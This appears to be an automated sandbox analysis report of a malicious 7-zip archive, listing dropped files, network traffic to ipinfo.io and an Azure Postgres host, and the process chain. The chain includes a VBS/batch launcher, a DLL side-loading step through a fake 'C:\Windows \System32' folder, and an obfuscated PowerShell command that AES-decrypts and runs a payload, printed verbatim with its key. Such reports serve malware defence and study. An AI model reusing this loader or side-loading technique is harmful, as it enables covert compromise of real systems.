          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Windows\Temp\__PSScriptPolicyTest_asq5knkp.d41.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Windows\Temp\__PSScriptPolicyTest_goxzkcnz.o3l.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Windows\Temp\__PSScriptPolicyTest_izv5uqzl.mmh.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Windows\Temp\__PSScriptPolicyTest_jeblxzpw.dor.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Windows\Temp\__PSScriptPolicyTest_ngv5j5oz.ofy.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Windows\Temp\__PSScriptPolicyTest_nuva0yqe.5go.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Windows\Temp\__PSScriptPolicyTest_rkmfjoz3.ldm.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Windows\Temp\__PSScriptPolicyTest_undw3f4t.tra.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Windows\Temp\__PSScriptPolicyTest_vudgegsv.hcb.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          Static File Info

          General

          File type:7-zip archive data, version 0.3
          Entropy (8bit):7.9999972889840985
          TrID:
          • 7-Zip compressed archive (6006/1) 100.00%
          File name:F.7z
          File size:77'248'657 bytes
          MD5:5132591a35248a8d71171cb5f4343334
          SHA1:78a0c5b34c107a68cad2d36424a6efbffac11412
          SHA256:ef33c2231c3d46e64e1d070493ef920e34fd4b7aec4145711eeac0cb0ccb6651
          SHA512:57542705c0df8ca4a6c50430789e20a245803163dfd8d2f0d47eca103befea25a723582e8a673392914625ebdccea8fdf1e48c829a86bb994df790535f5de536
          SSDEEP:1572864:tqYfBhXKIZAGdT5m6MX3x+RQtBm3CD59KiKoBV8vCmT2nl:tqA36xGSR+RyKpzvCmT0
          TLSH:DA0833EB619E7F22CCA64B3143AD1B66CF4B48AEE131CD105B657AD4410978EB30F879
          File Content Preview:7z..'...1..HL.......%.......q.8...4..]. .Hf..t....q..[.^...f...........VR...kRMVG.:....15.)].. .De./.P.....:...w[y.4..E..{....)..5n*h..."..m<.:|B....&s.Si...n...,.+.!......=~..5...N;L.:.W@0l.f...J...R.#.q....:."g3.iZ..o.....'...B. ...|.._....%.......w....

          File Icon

          Icon Hash:74f0e4e4e4e4e0e4

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Aug 30, 2024 07:40:45.852703094 CEST49726443192.168.2.1734.117.59.81
          Aug 30, 2024 07:40:45.852745056 CEST4434972634.117.59.81192.168.2.17
          Aug 30, 2024 07:40:45.852821112 CEST49726443192.168.2.1734.117.59.81
          Aug 30, 2024 07:40:45.856827974 CEST49726443192.168.2.1734.117.59.81
          Aug 30, 2024 07:40:45.856837988 CEST4434972634.117.59.81192.168.2.17
          Aug 30, 2024 07:40:46.322098017 CEST4434972634.117.59.81192.168.2.17
          Aug 30, 2024 07:40:46.322226048 CEST49726443192.168.2.1734.117.59.81
          Aug 30, 2024 07:40:46.329931021 CEST49726443192.168.2.1734.117.59.81
          Aug 30, 2024 07:40:46.329951048 CEST4434972634.117.59.81192.168.2.17
          Aug 30, 2024 07:40:46.330044031 CEST49726443192.168.2.1734.117.59.81
          Aug 30, 2024 07:40:46.330070019 CEST4434972634.117.59.81192.168.2.17
          Aug 30, 2024 07:40:46.330168009 CEST49726443192.168.2.1734.117.59.81
          Aug 30, 2024 07:40:55.156728983 CEST4972980192.168.2.17213.188.196.246
          Aug 30, 2024 07:40:55.161508083 CEST8049729213.188.196.246192.168.2.17
          Aug 30, 2024 07:40:55.161572933 CEST4972980192.168.2.17213.188.196.246
          Aug 30, 2024 07:40:55.163104057 CEST4972980192.168.2.17213.188.196.246
          Aug 30, 2024 07:40:55.167927027 CEST8049729213.188.196.246192.168.2.17
          Aug 30, 2024 07:40:56.305547953 CEST8049729213.188.196.246192.168.2.17
          Aug 30, 2024 07:40:56.305814981 CEST4972980192.168.2.17213.188.196.246
          Aug 30, 2024 07:40:56.311134100 CEST8049729213.188.196.246192.168.2.17
          Aug 30, 2024 07:40:56.311192036 CEST4972980192.168.2.17213.188.196.246
          Aug 30, 2024 07:40:56.332575083 CEST497305432192.168.2.1720.71.50.126
          Aug 30, 2024 07:40:56.337454081 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:40:56.337541103 CEST497305432192.168.2.1720.71.50.126
          Aug 30, 2024 07:40:56.337627888 CEST497305432192.168.2.1720.71.50.126
          Aug 30, 2024 07:40:56.342372894 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:40:56.960865974 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:40:57.011164904 CEST497305432192.168.2.1720.71.50.126
          Aug 30, 2024 07:41:06.288220882 CEST497305432192.168.2.1720.71.50.126
          Aug 30, 2024 07:41:06.293304920 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.463500023 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.463866949 CEST497305432192.168.2.1720.71.50.126
          Aug 30, 2024 07:41:06.468653917 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.640347958 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.640600920 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.640610933 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.640620947 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.640629053 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.640639067 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.640650034 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.640660048 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.640774012 CEST497305432192.168.2.1720.71.50.126
          Aug 30, 2024 07:41:06.640774012 CEST497305432192.168.2.1720.71.50.126
          Aug 30, 2024 07:41:06.640774012 CEST497305432192.168.2.1720.71.50.126
          Aug 30, 2024 07:41:06.732755899 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.733870029 CEST497305432192.168.2.1720.71.50.126
          Aug 30, 2024 07:41:06.733870029 CEST497305432192.168.2.1720.71.50.126
          Aug 30, 2024 07:41:06.738732100 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.738743067 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.909324884 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:06.959216118 CEST497305432192.168.2.1720.71.50.126
          Aug 30, 2024 07:41:07.044811010 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:07.045008898 CEST497305432192.168.2.1720.71.50.126
          Aug 30, 2024 07:41:07.049825907 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:07.224741936 CEST54324973020.71.50.126192.168.2.17
          Aug 30, 2024 07:41:07.278189898 CEST497305432192.168.2.1720.71.50.126

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Aug 30, 2024 07:40:45.843632936 CEST5486953192.168.2.171.1.1.1
          Aug 30, 2024 07:40:45.850521088 CEST53548691.1.1.1192.168.2.17
          Aug 30, 2024 07:40:55.149133921 CEST5826953192.168.2.171.1.1.1
          Aug 30, 2024 07:40:55.155946970 CEST53582691.1.1.1192.168.2.17
          Aug 30, 2024 07:40:56.309422016 CEST5840453192.168.2.171.1.1.1
          Aug 30, 2024 07:40:56.331722975 CEST53584041.1.1.1192.168.2.17

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Aug 30, 2024 07:40:45.843632936 CEST192.168.2.171.1.1.10x7887Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
          Aug 30, 2024 07:40:55.149133921 CEST192.168.2.171.1.1.10x4d22Standard query (0)worldtimeapi.orgA (IP address)IN (0x0001)false
          Aug 30, 2024 07:40:56.309422016 CEST192.168.2.171.1.1.10xfe6fStandard query (0)universalsqlserver.postgres.database.azure.comA (IP address)IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Aug 30, 2024 07:40:45.850521088 CEST1.1.1.1192.168.2.170x7887No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
          Aug 30, 2024 07:40:55.155946970 CEST1.1.1.1192.168.2.170x4d22No error (0)worldtimeapi.org213.188.196.246A (IP address)IN (0x0001)false
          Aug 30, 2024 07:40:56.331722975 CEST1.1.1.1192.168.2.170xfe6fNo error (0)universalsqlserver.postgres.database.azure.comuniversalsqlserver.privatelink.postgres.database.azure.comCNAME (Canonical name)IN (0x0001)false
          Aug 30, 2024 07:40:56.331722975 CEST1.1.1.1192.168.2.170xfe6fNo error (0)universalsqlserver.privatelink.postgres.database.azure.com20.71.50.126A (IP address)IN (0x0001)false

          HTTP Request Dependency Graph

          • worldtimeapi.org

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.1749729213.188.196.246806412C:\Windows\System32\svchost.exe
          TimestampBytes transferredDirectionData
          Aug 30, 2024 07:40:55.163104057 CEST75OUTGET /api/timezone/Etc/UTC HTTP/1.1
          Host: worldtimeapi.org
          Accept: */*
          Aug 30, 2024 07:40:56.305547953 CEST1167INHTTP/1.1 200 OK
          access-control-allow-credentials: true
          access-control-allow-origin: *
          access-control-expose-headers:
          cache-control: max-age=0, private, must-revalidate
          content-length: 335
          content-type: application/json; charset=utf-8
          cross-origin-window-policy: deny
          date: Fri, 30 Aug 2024 05:40:55 GMT
          server: Fly/e42c399f (2024-08-28)
          vary: accept-encoding
          x-content-type-options: nosniff
          x-download-options: noopen
          x-frame-options: SAMEORIGIN
          x-permitted-cross-domain-policies: none
          x-ratelimit-limit: 60
          x-ratelimit-remaining: 59
          x-ratelimit-reset: 1724997600
          x-request-from: 8.46.123.33
          x-request-id: F_BrIxoNo4gV0tqDYLeB
          x-request-regions: a/iad;s/yyz
          x-response-origin: e2865522b1d968
          x-runtime: 51ms
          x-xss-protection: 1; mode=block
          via: 1.1 fly.io
          fly-request-id: 01J6GWT35CYJ3P0SD4C9FNR3CW-iad
          Data Raw: 7b 22 75 74 63 5f 6f 66 66 73 65 74 22 3a 22 2b 30 30 3a 30 30 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 74 63 2f 55 54 43 22 2c 22 64 61 79 5f 6f 66 5f 77 65 65 6b 22 3a 35 2c 22 64 61 79 5f 6f 66 5f 79 65 61 72 22 3a 32 34 33 2c 22 64 61 74 65 74 69 6d 65 22 3a 22 32 30 32 34 2d 30 38 2d 33 30 54 30 35 3a 34 30 3a 35 35 2e 38 32 36 33 36 31 2b 30 30 3a 30 30 22 2c 22 75 74 63 5f 64 61 74 65 74 69 6d 65 22 3a 22 32 30 32 34 2d 30 38 2d 33 30 54 30 35 3a 34 30 3a 35 35 2e 38 32 36 33 36 31 2b 30 30 3a 30 30 22 2c 22 75 6e 69 78 74 69 6d 65 22 3a 31 37 32 34 39 39 36 34 35 35 2c 22 72 61 77 5f 6f 66 66 73 65 74 22 3a 30 2c 22 77 65 65 6b 5f 6e 75 6d 62 65 72 22 3a 33 35 2c 22 64 73 74 22 3a 66 61 6c 73 65 2c 22 61 62 62 72 65 76 69 61 74 69 6f 6e 22 3a 22 55 54 43 22 2c 22 64 73 74 5f 6f 66 66 73 65 74 22 3a 30 2c 22 64 73 74 5f 66 72 6f 6d 22 3a 6e 75 6c 6c 2c 22 64 73 74 5f 75 6e 74 69 6c 22 3a 6e 75 6c 6c 2c 22 63 6c 69 65 6e 74 5f 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
          Data Ascii: {"utc_offset":"+00:00","timezone":"Etc/UTC","day_of_week":5,"day_of_year":243,"datetime":"2024-08-30T05:40:55.826361+00:00","utc_datetime":"2024-08-30T05:40:55.826361+00:00","unixtime":1724996455,"raw_offset":0,"week_number":35,"dst":false,"abbreviation":"UTC","dst_offset":0,"dst_from":null,"dst_until":null,"client_ip":"8.46.123.33"}


          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:01:38:49
          Start date:30/08/2024
          Path:C:\Windows\System32\OpenWith.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\OpenWith.exe -Embedding
          Imagebase:0x7ff67cd60000
          File size:123'984 bytes
          MD5 hash:E4A834784FA08C17D47A1E72429C5109
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:3
          Start time:01:39:05
          Start date:30/08/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Imagebase:0x7ff7ca9b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          General

          Target ID:9
          Start time:01:39:11
          Start date:30/08/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
          Imagebase:0x7ff7ca9b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:10
          Start time:01:39:12
          Start date:30/08/2024
          Path:C:\Windows\System32\SgrmBroker.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\SgrmBroker.exe
          Imagebase:0x7ff782530000
          File size:329'504 bytes
          MD5 hash:3BA1A18A0DC30A0545E7765CB97D8E63
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          General

          Target ID:11
          Start time:01:39:12
          Start date:30/08/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
          Imagebase:0x7ff7ca9b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          General

          Target ID:12
          Start time:01:39:12
          Start date:30/08/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
          Imagebase:0x7ff7ca9b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          General

          Target ID:14
          Start time:01:39:12
          Start date:30/08/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
          Imagebase:0x7ff7ca9b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          General

          Target ID:15
          Start time:01:39:13
          Start date:30/08/2024
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\svchost.exe -k UnistackSvcGroup
          Imagebase:0x7ff7ca9b0000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          General

          Target ID:16
          Start time:01:39:26
          Start date:30/08/2024
          Path:C:\Program Files\7-Zip\7zFM.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\Fzip"
          Imagebase:0x640000
          File size:952'832 bytes
          MD5 hash:30AC0B832D75598FB3EC37B6F2A8C86A
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          General

          Target ID:18
          Start time:01:40:03
          Start date:30/08/2024
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\rootdir\x447823.vbs"
          Imagebase:0x7ff6ed8b0000
          File size:170'496 bytes
          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:19
          Start time:01:40:04
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rootdir\x615759.bat" "
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:20
          Start time:01:40:04
          Start date:30/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff772470000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:21
          Start time:01:40:04
          Start date:30/08/2024
          Path:C:\Windows\System32\chcp.com
          Wow64 process (32bit):false
          Commandline:chcp 65001
          Imagebase:0x7ff69afc0000
          File size:14'848 bytes
          MD5 hash:33395C4732A49065EA72590B14B64F32
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:23
          Start time:01:40:04
          Start date:30/08/2024
          Path:C:\Windows\explorer.exe
          Wow64 process (32bit):false
          Commandline:explorer "..\USB Drive"
          Imagebase:0x7ff672e00000
          File size:5'141'208 bytes
          MD5 hash:662F4F92FDE3557E86D110526BB578D5
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:24
          Start time:01:40:04
          Start date:30/08/2024
          Path:C:\Windows\explorer.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
          Imagebase:0x7ff672e00000
          File size:5'141'208 bytes
          MD5 hash:662F4F92FDE3557E86D110526BB578D5
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:false

          General

          Target ID:25
          Start time:01:40:04
          Start date:30/08/2024
          Path:C:\Windows\System32\xcopy.exe
          Wow64 process (32bit):false
          Commandline:xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y
          Imagebase:0x7ff6f5310000
          File size:50'688 bytes
          MD5 hash:39FBFD3AF58238C6F9D4D408C9251FF5
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:26
          Start time:01:40:05
          Start date:30/08/2024
          Path:C:\Windows\System32\xcopy.exe
          Wow64 process (32bit):false
          Commandline:xcopy "x249569.dat" "C:\Windows \System32" /Y
          Imagebase:0x7ff6f5310000
          File size:50'688 bytes
          MD5 hash:39FBFD3AF58238C6F9D4D408C9251FF5
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:27
          Start time:01:40:08
          Start date:30/08/2024
          Path:C:\Windows \System32\printui.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows \System32\printui.exe"
          Imagebase:0x7ff78de30000
          File size:64'000 bytes
          MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Antivirus matches:
          • Detection: 0%, ReversingLabs
          • Detection: 0%, Virustotal, Browse
          Has exited:true

          General

          Target ID:28
          Start time:01:40:08
          Start date:30/08/2024
          Path:C:\Windows \System32\printui.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows \System32\printui.exe"
          Imagebase:0x7ff78de30000
          File size:64'000 bytes
          MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:31
          Start time:01:40:08
          Start date:30/08/2024
          Path:C:\Windows \System32\printui.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows \System32\printui.exe"
          Imagebase:0x7ff78de30000
          File size:64'000 bytes
          MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Has exited:true

          General

          Target ID:32
          Start time:01:40:09
          Start date:30/08/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\cmd.exe" /c powershell -Command "function dcstr { param ( [string]$cptx, [byte[]]$ky, [byte[]]$vv ) $aee = [System.Security.Cryptography.Aes]::Create(); $aee.Key = $ky; $aee.IV = $vv; $decr = $aee.CreateDecryptor($aee.Key, $aee.IV); $ciptbyt = [System.Convert]::FromBase64String($cptx); $decrbyt = $decr.TransformFinalBlock($ciptbyt, 0, $ciptbyt.Length); return [System.Text.Encoding]::UTF8.GetString($decrbyt); } $b64 = 'bEwPXcExNI2H+9tnOrO88vZr8LsvFbHxwO43zjWB2UEe39wbWt2wfYJn+M6AjL2oz3gIgcocur6WCc/5IYLV6c3HjNhgfxV59aCFOKqxmKXu/mfoJbe45VyAXPin5ErM20zro4fLljjJuxjliX/F0TOK8TE1CgAQLpE0b+Bo2x4Qgs6hRalwuJuorg9Gjhgh'; $ky = [byte[]](0x1E, 0x5B, 0x26, 0xF0, 0x75, 0x52, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE4, 0x98, 0xE4); $vv = [byte[]](0x10, 0x5B, 0x26, 0xE1, 0x75, 0x51, 0xE6, 0xF4, 0x7D, 0xBB, 0x3A, 0x6D, 0xB0, 0xE1, 0x88, 0xFF); $pcmd = dcstr -cptx $b64 -ky $ky -vv $vv; Invoke-Expression $pcmd;"
          Imagebase:0x7ff665a60000
          File size:289'792 bytes
